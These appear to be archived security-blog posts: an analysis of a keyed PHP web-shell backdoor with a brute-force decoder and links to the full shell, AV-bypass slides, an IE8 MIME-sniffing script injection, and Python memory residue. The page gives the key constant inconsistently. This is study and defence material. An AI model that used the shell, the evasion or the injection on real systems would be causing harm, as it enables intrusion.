<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBysQiznJjrty7pk2qKGNsak6tJGEeZmrBZldreaOZ_zB6rfGuD86feL7-8w1bWeHONKnizKYDdq1lFvVF-skzgKLmHMRxNWvkQXprGDwIpLvBbjRz1NUVYr9NA1bXEjf9XIRTU9HZAYhH/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBysQiznJjrty7pk2qKGNsak6tJGEeZmrBZldreaOZ_zB6rfGuD86feL7-8w1bWeHONKnizKYDdq1lFvVF-skzgKLmHMRxNWvkQXprGDwIpLvBbjRz1NUVYr9NA1bXEjf9XIRTU9HZAYhH/s1600/capture2.PNG" height="227" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Summary on how this backdoor works:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>The malicious data is stored in base64.</li>
<li>Upon execution of the script, <b>$data</b> is decoded from base64.</li>
<li>The attacker/controller needs to submit the correct <b>$key_value</b> via <b>POST</b> or <b>COOKIE</b>.</li>
<li>Each byte of the decoded data in <b>$data_decode</b> is XORed against <b>(($key_value + 72670) % 256)</b>.</li>
<li>The <b>$data_decode</b> string is reversed and inflated via <b>gzinflate</b>, and the result is assigned to <b>$data_deflate</b>.</li>
<li>The crc32 of <b>$data_deflate</b> is compared against <b>$data_crc32</b> to ensure the integrity of the code.</li>
<li>A full payload function is created and executed.</li>
</ul>
<br />
Based on experience, you can predict that the final output will contain a call to <b>exec(), eval(), proc_open()</b> or the like.<br />
<br />
There are 3 major challenges in decoding <b>$data</b> properly:<br />
<br />
<ul style="text-align: left;">
<li>Finding the correct key.</li>
<li>Any error in <b>gzinflate()</b> will trigger an exception and stop the script from executing.</li>
<li>Getting the correct crc32 checksum.</li>
</ul>
<div>
Although the correct key is generated from <b>($key_value + 76270) mod 256</b>, it is possible to simply brute-force the key from 0x00 to 0xFF, because the payload is XORed one byte at a time.</div>
<div>
<br /></div>
<div>
I tried to decode it in Python. To my disappointment there is no gzinflate function in Python, but a well-known snippet to compensate for that is as below:</div>
<div>
<br /></div>
<div>
<pre>import zlib
# 'x\x9c' is a zlib stream header; prepending it lets the default decompressor
# accept the raw DEFLATE data that PHP's gzinflate() would consume directly.
ungziped_str = zlib.decompressobj().decompress(b'x\x9c' + gziped_str)</pre>
</div>
<div>
So, with my whatever-level scripting skills: if I can find the correct key, I should be able to print out the payload.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY20-hhDSd7WYxAqWuLJle9wONfAEr0pl-ya3spIccJ_yQhH2RDpBg8Y7DEhCxKefdeRJnyHcEJ1TCeoWxr8EUvo7HtRqr_x5CLH24SlwSXLtFlbA-vGTDlPXt6d_KTyp22-cBjvofQRT9/s1600/capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY20-hhDSd7WYxAqWuLJle9wONfAEr0pl-ya3spIccJ_yQhH2RDpBg8Y7DEhCxKefdeRJnyHcEJ1TCeoWxr8EUvo7HtRqr_x5CLH24SlwSXLtFlbA-vGTDlPXt6d_KTyp22-cBjvofQRT9/s1600/capture3.PNG" height="240" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But will the script work as expected?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz-ZHLtYvBdyhE8PSQzK4MDIdYdSX0aS0VyzQvYqTGM38emD_may_RJmsQ4EIyYG1IZxUjW_sFCIsuRIdIhzZ7e55cq9LEBgGMmmfWw7sjo22W4nEyub0jNHPQ80_HLadULx8zio-znWNz/s1600/Capture4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz-ZHLtYvBdyhE8PSQzK4MDIdYdSX0aS0VyzQvYqTGM38emD_may_RJmsQ4EIyYG1IZxUjW_sFCIsuRIdIhzZ7e55cq9LEBgGMmmfWw7sjo22W4nEyub0jNHPQ80_HLadULx8zio-znWNz/s1600/Capture4.png" height="94" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<b>TOPKEK, damn this zlib</b></div>
<div>
<b><br /></b></div>
<div>
I'm still figuring out how to inflate the string without triggering an exception.</div>
<div>
<br /></div>
<div>
<b>Conclusion</b></div>
<div>
<b><br /></b></div>
<div>
The backdoor is, duh, obviously a backdoor; it can be detected easily. However, keying the gzinflate input stops the payload from being decoded and executed, both by a normal user and by a reverser.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
P/S: <b>If anyone can solve this problem it would be nice.</b></div>
<div>
<br /></div>
<div>
The links are attached below:</div>
<div>
<br /></div>
<div>
1. Original Code : <a href="http://pastebin.com/aLS0NtdZ">http://pastebin.com/aLS0NtdZ</a></div>
<div>
2. Label Code : <a href="http://pastebin.com/Gg56vLni">http://pastebin.com/Gg56vLni</a></div>
<div>
3. Half-Baked Decoder in Python: <a href="http://pastebin.com/HzgFmgr1">http://pastebin.com/HzgFmgr1</a></div>
<div>
<br /></div>
<div>
By the way, it's May. Stay tuned for <b>WARGAMES 2015.</b><br />
<b><br /></b>
<span style="color: red;">Updated</span>:<br />
<br />
Thanks to <a href="https://www.facebook.com/fadhil86?fref=ufi" target="_blank">Syed Mohd Fadhil</a>, who introduced two ways to handle the zlib error.<br />
Instead of using 'x\x9c', follow the guide from <a href="http://www.php2python.com/wiki/function.gzinflate/" target="_blank">php2python</a>: the Python equivalent of PHP's gzinflate is<br />
<br />
<blockquote class="tr_bq">
<pre style="font-size: 15px;">zlib.decompress(compressed_data, -15)</pre>
</blockquote>
He also introduced a nice <b>try and except</b> block to deal with any exception.<br />
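As an added example (not the post's decoder or the pastebin scripts), here is a Python 3 version of the two fixes above together with the brute force they make possible: raw-DEFLATE inflation via wbits=-15, a try/except around each candidate key, and the ($key_value + 76270) mod 256 derivation from the post. The sample blob is constructed here and the helper names are my own.

```python
import zlib

# Added example, not the post's code. PHP's gzinflate()/gzdeflate() work on raw
# DEFLATE streams: no zlib header, no Adler-32 trailer. Negative wbits tells
# zlib exactly that, which is the php2python fix quoted above.
WBITS_RAW_DEFLATE = -15


def php_gzinflate(data: bytes) -> bytes:
    """Python equivalent of PHP gzinflate(): inflate a raw DEFLATE stream."""
    return zlib.decompress(data, WBITS_RAW_DEFLATE)


def php_gzdeflate(data: bytes) -> bytes:
    """Python equivalent of PHP gzdeflate(); used here only to build the sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, WBITS_RAW_DEFLATE)
    return comp.compress(data) + comp.flush()


def derive_key(key_value: int) -> int:
    """The key derivation the post describes: ($key_value + 76270) mod 256."""
    return (key_value + 76270) % 256


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (the obfuscation layer in the post)."""
    return bytes(b ^ key for b in data)


def looks_like_text(data: bytes) -> bool:
    """Cheap plausibility filter: printable ASCII plus tab/newline only."""
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def brute_force_xor_inflate(blob: bytes) -> list[tuple[int, bytes]]:
    """Try all 256 single-byte keys and return (key, plaintext) candidates.

    A wrong key almost always yields bytes that are not a valid DEFLATE stream,
    so zlib raises zlib.error; catching it per key is what keeps the loop
    alive instead of letting the first bad key abort the script. Random bytes
    can occasionally inflate to a short nonsense stream, so candidates are
    filtered for text-likeness and sorted longest first; the real payload
    dominates.
    """
    candidates = []
    for key in range(256):
        try:
            plain = php_gzinflate(xor_single_byte(blob, key))
        except zlib.error:
            continue  # not a DEFLATE stream under this key; try the next one
        if looks_like_text(plain):
            candidates.append((key, plain))
    candidates.sort(key=lambda kp: len(kp[1]), reverse=True)
    return candidates


# Constructed, harmless stand-in for the obfuscated payload (not the post's code).
SAMPLE_PLAINTEXT = (
    b"echo 'constructed placeholder payload';\n"
    b"// the post's real payload is deliberately not reproduced here\n"
)
SAMPLE_KEY = derive_key(0x41)  # (65 + 76270) % 256 == 47
SAMPLE_BLOB = xor_single_byte(php_gzdeflate(SAMPLE_PLAINTEXT), SAMPLE_KEY)


def recover_sample() -> tuple[int, bytes]:
    """Run the brute force over the constructed blob; returns (key, plaintext)."""
    return brute_force_xor_inflate(SAMPLE_BLOB)[0]


if __name__ == "__main__":
    key, plain = recover_sample()
    print(f"key=0x{key:02x}")
    print(plain.decode())
```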
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGVWz6IJXRzVEeH1E0NUKuDlUrW6yy634iWVYlC5Ba5OjVyS1WHUhFDzhaDjxXp8FjUmJYtNRilPd38hyphenhyphengerIUEOS_m74G1oOy9e5Ka4Zp5ylENwHOqMiiQupoobBXzw7xjiXclgnT84b/s1600/capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGVWz6IJXRzVEeH1E0NUKuDlUrW6yy634iWVYlC5Ba5OjVyS1WHUhFDzhaDjxXp8FjUmJYtNRilPd38hyphenhyphengerIUEOS_m74G1oOy9e5Ka4Zp5ylENwHOqMiiQupoobBXzw7xjiXclgnT84b/s1600/capture4.PNG" height="130" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And voilà, we have a nice shell.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQDj13zT1LxImWvTbEwh4QQ9fb259JC3dN7c69HBFFKkzvb7OUqKwYXnNQKL3NGDfA5-zQCbl1CSbSO5BNnw8mBPQFtXs2y2ZMIdfMaaSyvuezEFqkuK5KzxN9owbw0846C7wX5xIi-rk/s1600/capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQDj13zT1LxImWvTbEwh4QQ9fb259JC3dN7c69HBFFKkzvb7OUqKwYXnNQKL3NGDfA5-zQCbl1CSbSO5BNnw8mBPQFtXs2y2ZMIdfMaaSyvuezEFqkuK5KzxN9owbw0846C7wX5xIi-rk/s1600/capture5.PNG" height="191" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thanks all for the help</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The full links are attached:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Bruteforce script: <a href="http://pastebin.com/AFDJcUpK">http://pastebin.com/AFDJcUpK</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Full Web Shell Code : <a href="http://pastebin.com/nmgQwTTf">http://pastebin.com/nmgQwTTf</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
</div>
Bypassing AV in 2015 (2015-03-15)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Haven't blogged for quite some time. These are the basic classical techniques that can be used to bypass AV via Python. Take note that the current code might not bypass everything, BUT be aware that there are tons of APIs that can be used :)<br />
<br />
<br /></div>
<iframe frameborder="0" height="400" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/45845753" width="476"></iframe><br />
<br />
<br />
Get the PDF Files here<br />
<br />
https://drive.google.com/file/d/0B9B87VpPnaYiZHZsUjZORXd2Qzg/view?usp=sharing<br />
<br />
<br />
<br />
<br /></div>
Gadget Review : Xperia M2 (value for money) (2014-07-22)<div dir="ltr" style="text-align: left;" trbidi="on">
I usually don't blog much about gadgets. But my phone had become too antique and hot (anybody still using an iPhone 4?). Times change, iOS is getting boring, and my exploitation knowledge needs to gear up a little bit.<br />
<br />
So after a quick review with my master, the Xperia M2 seems to be the right choice. Let's not bother about spec quality, since it's not really that important whether it's JB or ICS, Dalvik or ART, 21 megapixels versus 5 megapixels, latest kernel or not... for me <i>it doesn't matter.</i><br />
<i><br /></i>
What matters for me.<br />
<br />
<br />
1. <b>Rootable and Bootloader Unlocked. Checked!</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbnaZUjM70B9rQUvOUqvpq0UgKKeSQ381mFw0FUxRG1Or_aJ-rlCQI0nuK-XOocHGVViEWDKwFC0m2ZuZYIpRPkfuWgrCL1ioBpQVJVjKptxlYpa5m-qMkuQQyco-gR3opfsmQS6s67Owm/s1600/rooting-status.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbnaZUjM70B9rQUvOUqvpq0UgKKeSQ381mFw0FUxRG1Or_aJ-rlCQI0nuK-XOocHGVViEWDKwFC0m2ZuZYIpRPkfuWgrCL1ioBpQVJVjKptxlYpa5m-qMkuQQyco-gR3opfsmQS6s67Owm/s1600/rooting-status.png" height="320" width="180" /></a></div>
<b><br /></b>
Rooting and an unlockable bootloader are a must if we want to access most of the internal hardware capability provided by this phone.<br />
<br />
2. <b>Support Android Hacker Keyboard</b><br />
<b><br /></b>
Swipe/TouchWiz crap? Hacker Keyboard is mandatory for me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgquj-Z9O_2_7aS8W5zJdlVJWeQ80DCwGxMma2Vq6aKed0VXPrra19y7z5ATMFwIyufOAHtkfa3UQqW2OK_eiSBGsE1VC2S6Mdgexh96-Nglh9prOud8ZYee5k3_xTs-v6PJO738IZpUA6/s1600/hackers_keyboard_android_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgquj-Z9O_2_7aS8W5zJdlVJWeQ80DCwGxMma2Vq6aKed0VXPrra19y7z5ATMFwIyufOAHtkfa3UQqW2OK_eiSBGsE1VC2S6Mdgexh96-Nglh9prOud8ZYee5k3_xTs-v6PJO738IZpUA6/s1600/hackers_keyboard_android_2.gif" height="192" width="320" /></a></div>
<br />
<br />
3. <b>NXP Based NFC.</b><br />
<br />
This is the NFC best suited to the Malaysian environment, cough cough.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHHxO6cYNw6jV_5TKjmlDfBaoGjBkPEde_Ccv7yD3e12iNFc0pMC8h_j4rffV1rhyphenhyphen_ac1Ty1VbIGMFHGYh9dy70Bhkr0G1X8apHczZR_fwSbh9uVWaZFCE1wwshK2gD5zZ5cBDjWgwnyV8/s1600/unnamed.webp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHHxO6cYNw6jV_5TKjmlDfBaoGjBkPEde_Ccv7yD3e12iNFc0pMC8h_j4rffV1rhyphenhyphen_ac1Ty1VbIGMFHGYh9dy70Bhkr0G1X8apHczZR_fwSbh9uVWaZFCE1wwshK2gD5zZ5cBDjWgwnyV8/s1600/unnamed.webp" height="320" width="179" /></a></div>
<br />
<b>4. Brick Resistance. </b><br />
<br />
On the Xperia M2 there's a hidden switch beside the SIM card and MMC slots that can restore the phone to its original factory state. Use it with caution.<br />
<br />
<br />
5. <b>The Lord of Internet.</b><br />
<b><br /></b>
Can we combine LTE + WiMAX + Wi-Fi all together and create happy NAT balancing? You bet!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0enWYoqkxMqsGcTiXh5pnaAlySXbIvosxiLOBEhXHnEeRzML82oLAoS9cO9TtElsEozE-PhplLBwJPAXERI1a3CVAw_ELAHEJdi3tVtluZMYla6xKNY2lic2TU44Hz_RskzJQwdX_8EL/s1600/IMG_1030.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0enWYoqkxMqsGcTiXh5pnaAlySXbIvosxiLOBEhXHnEeRzML82oLAoS9cO9TtElsEozE-PhplLBwJPAXERI1a3CVAw_ELAHEJdi3tVtluZMYla6xKNY2lic2TU44Hz_RskzJQwdX_8EL/s1600/IMG_1030.JPG" height="309" width="320" /></a></div>
<br />
<br />
<div>
<b><br /></b></div>
</div>
Why is a raven like a writing desk? IE8 plain/text MIME Type or Media Type Issues (2014-06-08)<div dir="ltr" style="text-align: left;" trbidi="on">
<i>P/S: This might not be a new issue at all (but I documented it so I won't forget, or at least know where to look).</i><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://a1.s6img.com/cdn/0011/p/3092487_5807113_lz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://a1.s6img.com/cdn/0011/p/3092487_5807113_lz.jpg" height="320" width="294" /></a> from Alice in Wonderland</div>
<br />
My life has its ups and downs. But last week was quite interesting: I was fortunate enough to be given a chance to conduct a session on some lightning/bizarre penetration testing techniques at a prestigious organization that can block <b>PornHub.</b><br />
<b><br /></b>
During my class on pwning a Win7 box I noticed that IE8 has some bizarre MIME type interpretation behaviour.<br />
<br />
With a plain/text MIME type, IE8 will interpret CSS/JavaScript input under <b>Compatibility View mode</b> (the default mode).<br />
<br />
Well, that just sucks, right?<br />
<br />
POC.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDFf5xyDExzyzUcaUQAQcjeMXdIBKSfBLOfiuMYwnZw9lAHjgDYq6pxZVJMgxq2Plm9loEO5NUB1rYMZbtOgURMqRVMaXEePEFT-FHzNY2GXS5uy9S-uz_q0_WQFRMQs3BsqlQNj2RyTFI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDFf5xyDExzyzUcaUQAQcjeMXdIBKSfBLOfiuMYwnZw9lAHjgDYq6pxZVJMgxq2Plm9loEO5NUB1rYMZbtOgURMqRVMaXEePEFT-FHzNY2GXS5uy9S-uz_q0_WQFRMQs3BsqlQNj2RyTFI/s1600/1.png" height="92" width="320" /></a></div>
<br />
That was expected: the plain/text MIME type was interpreted correctly.<br />
<br />
Now on IE8<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j7oWQdwG0aUILOtakKN9RMin7l5GwWr-_mLT4Qv32GIUnnxC6Guz98p6PO5jHxIiNTVFXZ40SdIMXdHK5X7UD_ez8I53QjHUhXG7I9yCNJvyxU0sJqoIQiIEb2urcpSaQQvRHEzd_YOE/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j7oWQdwG0aUILOtakKN9RMin7l5GwWr-_mLT4Qv32GIUnnxC6Guz98p6PO5jHxIiNTVFXZ40SdIMXdHK5X7UD_ez8I53QjHUhXG7I9yCNJvyxU0sJqoIQiIEb2urcpSaQQvRHEzd_YOE/s1600/2.png" height="189" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">I trip and spray :(</td></tr>
</tbody></table>
Can we steal cookies?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2rb8XFoLcMvoLVzJE7Iw6Gj1qBprmTguqhX1VhWWc_BJfG7HIKfwcVzsgSUXx51OuLO77f5bGPxAdkeG9rEWNimqeU0nlJyeFLUTbgJP1mCshYpwadqxNDtV-m4Jd0iUIXmpRs8U-XYu/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2rb8XFoLcMvoLVzJE7Iw6Gj1qBprmTguqhX1VhWWc_BJfG7HIKfwcVzsgSUXx51OuLO77f5bGPxAdkeG9rEWNimqeU0nlJyeFLUTbgJP1mCshYpwadqxNDtV-m4Jd0iUIXmpRs8U-XYu/s1600/3.png" height="202" width="320" /></a></div>
<br />
Solution?<br />
1. Disable Compatibility View if you are not a developer.<br />
2. Upgrade to the latest IE<br />
3. Don't use IE at all<br />
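Added example, not from the post: the server-side counterpart to the three client-side fixes above, in Python. The X-Content-Type-Options: nosniff header (honoured by IE8 and later) keeps a text/plain response from being sniffed into HTML; the audit function flags responses that lack it, and the handler, the body and the function names are constructed for this example.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Added example, not from the post. A constructed body of the kind the post shows:
# "plain text" that happens to contain markup. If IE8 in Compatibility View sniffs
# it as HTML, it renders in the serving site's origin.
CONSTRUCTED_UNTRUSTED_TEXT = b"<b>constructed markup inside a text file</b>\n"


def audit_response_headers(headers: dict[str, str]) -> list[str]:
    """Return findings for a response that IE8 may content-sniff.

    Header names are matched case-insensitively. The check is intentionally
    narrow: it covers the text/plain case the post describes and the
    missing-Content-Type case, which every browser sniffs.
    """
    norm = {k.lower(): v for k, v in headers.items()}
    findings = []
    ctype = norm.get("content-type")
    if ctype is None:
        findings.append("no Content-Type: the browser will guess the type from the body")
        return findings
    media_type = ctype.split(";")[0].strip().lower()
    nosniff = norm.get("x-content-type-options", "").strip().lower() == "nosniff"
    if media_type == "text/plain" and not nosniff:
        findings.append("text/plain without X-Content-Type-Options: nosniff: "
                        "IE8 may upgrade the body to HTML and run any script in it")
    return findings


def hardened_text_headers(body_len: int) -> dict[str, str]:
    """Headers that keep a text/plain response as text in IE8 and later."""
    return {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",  # IE8+ honour this: no MIME sniffing
        "Content-Length": str(body_len),
    }


class HardenedTextHandler(BaseHTTPRequestHandler):
    """Serves the constructed untrusted text with the hardened headers."""

    def do_GET(self):
        body = CONSTRUCTED_UNTRUSTED_TEXT
        self.send_response(200)
        for name, value in hardened_text_headers(len(body)).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Browse to http://127.0.0.1:8080/ with IE8 in Compatibility View and compare
    # against the same body served with a bare "Content-Type: text/plain".
    HTTPServer(("127.0.0.1", 8080), HardenedTextHandler).serve_forever()
```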
<br />
<br />
<br /></div>
Immutable Data and Memory Sensitivity.. (2014-04-13)<div dir="ltr" style="text-align: left;" trbidi="on">
Consider this Python code snippet<br />
<br />
<pre>import hashlib

while True:
    print("Enter your password")
    s = raw_input('--> ')              # s is bound to the plaintext str the user typed
    print(s)
    print("Now the md5sum")
    s = hashlib.md5(s).hexdigest()     # s is rebound to a new str holding the hex digest
    print(s)</pre>
<div>
<br /></div>
By any means it's a relatively simple piece of code to understand: we use <i>s</i> as a placeholder for our incoming data string, compute its md5sum and replace the value of <i>s</i> with the hex digest. In short, <i>s</i> now contains the md5sum in hex, right? So any plaintext that we've entered should vanish and be flushed out by the garbage collector in the Python VM, right?<br />
<br />
Let's give it a test.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kC1D1WggwqRHs3nUwLMf0s1M1etKwokThL1YYBjKDE03Y-MnbtM4NCR9ye_P2G1wv6bA1W70YKTszUMNQsQwyeUeO3zjB2huvSUz5IM_py6y_fjfiQ1xsMxS9G6ln1iZEOWTGBpeeOlh/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kC1D1WggwqRHs3nUwLMf0s1M1etKwokThL1YYBjKDE03Y-MnbtM4NCR9ye_P2G1wv6bA1W70YKTszUMNQsQwyeUeO3zjB2huvSUz5IM_py6y_fjfiQ1xsMxS9G6ln1iZEOWTGBpeeOlh/s1600/Capture.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
So most people would think any previous plaintext value would be washed out of memory. The string DogFood won't exist, right? Let's attach the current script to a debugger (I'm using the edb debugger, the best thing besides WinDbg; sorry Stallman, gdb just sux!!!!).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizVvFWULnU2sBrcWfh2qeEvDp9Nl2fUBz0BYcV3nEtqHjQsKmxq0cRPRIBiXgpG1cnvnuAl7SQ1xoKAdWdZ0WW_R_IqIbPVOPlBq7KOPwLEG3wfB3FnvKsd0HhF_hmov60N2hNvVEhazsL/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizVvFWULnU2sBrcWfh2qeEvDp9Nl2fUBz0BYcV3nEtqHjQsKmxq0cRPRIBiXgpG1cnvnuAl7SQ1xoKAdWdZ0WW_R_IqIbPVOPlBq7KOPwLEG3wfB3FnvKsd0HhF_hmov60N2hNvVEhazsL/s1600/Capture2.PNG" height="195" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I like using the edb debugger; it helps, for example, with binary string searches. Since we have replaced the value of s from DogFood with a hex string, we shouldn't see any DogFood string in memory, right? Unfortunately that is entirely untrue :(</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMCJRAB-2AK3Lv2J7v_IOrJ9gYctfWxBZH9tc6sjxlde6iRXxQ6Zz6tUXG7BFetO3N3Se2mEwylWbzgpsDsILxB3hbCXAZsP9YlmTSBpCBSg0AcCWS-Jo9kE8yegjBqeKmmqDwJYrK-xg/s1600/Capture3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMCJRAB-2AK3Lv2J7v_IOrJ9gYctfWxBZH9tc6sjxlde6iRXxQ6Zz6tUXG7BFetO3N3Se2mEwylWbzgpsDsILxB3hbCXAZsP9YlmTSBpCBSg0AcCWS-Jo9kE8yegjBqeKmmqDwJYrK-xg/s1600/Capture3.png" height="285" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitXH0xPzxD4i4orb3BKNbwZEE6YH98NEwUb19jJQ0kR75eZUfBoWcy5EJlXx_Ixooj8XO0012TZOOrcKr_c_43ALGV7MbKVTrZo20rp700xuMkDG-OEGiW1L19jSN79ESl8f4s3PavW11p/s1600/Capture4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitXH0xPzxD4i4orb3BKNbwZEE6YH98NEwUb19jJQ0kR75eZUfBoWcy5EJlXx_Ixooj8XO0012TZOOrcKr_c_43ALGV7MbKVTrZo20rp700xuMkDG-OEGiW1L19jSN79ESl8f4s3PavW11p/s1600/Capture4.PNG" height="134" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DogFood in Hex</td></tr>
</tbody></table>
<span style="background-color: white;">High-level languages often have data types that are </span><i style="background-color: white;">immutable</i><span style="background-color: white;">. The program can only write to an immutable object once, at creation time. In other words, <i>s</i> is just a label, and the string may be stored at the same address or anywhere else in memory. (Note to self: heap/stack/bss/dss are really labels the computer assigns to give us an approximate understanding of a specific region of memory.)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Let's search for the md5sum string. </span>36f65df05afee9fb079943b7ba5d9617<br />
<span style="background-color: white;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
